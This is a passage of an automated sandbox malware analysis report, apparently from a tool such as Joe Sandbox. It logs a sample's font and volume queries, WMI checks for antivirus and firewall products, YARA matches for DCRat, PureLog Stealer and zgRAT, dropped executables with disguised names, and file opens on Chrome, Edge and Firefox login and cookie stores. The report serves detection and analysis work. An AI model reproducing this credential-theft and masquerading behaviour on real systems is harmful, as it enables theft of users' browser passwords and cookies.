                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\ChainbrowserNet\serverDll.exe VolumeInformation
                                    Source: C:\Users\Default\Videos\System.exeQueries volume information: C:\Users\Default\Videos\System.exe VolumeInformation
                                    Source: C:\Users\Default\Videos\System.exeQueries volume information: C:\Users\Default\Videos\System.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\ChainbrowserNet\backgroundTaskHost.exe VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A4DF1E
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3B146 GetVersionExW,0_2_00A3B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverDll.exe PID: 5300, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
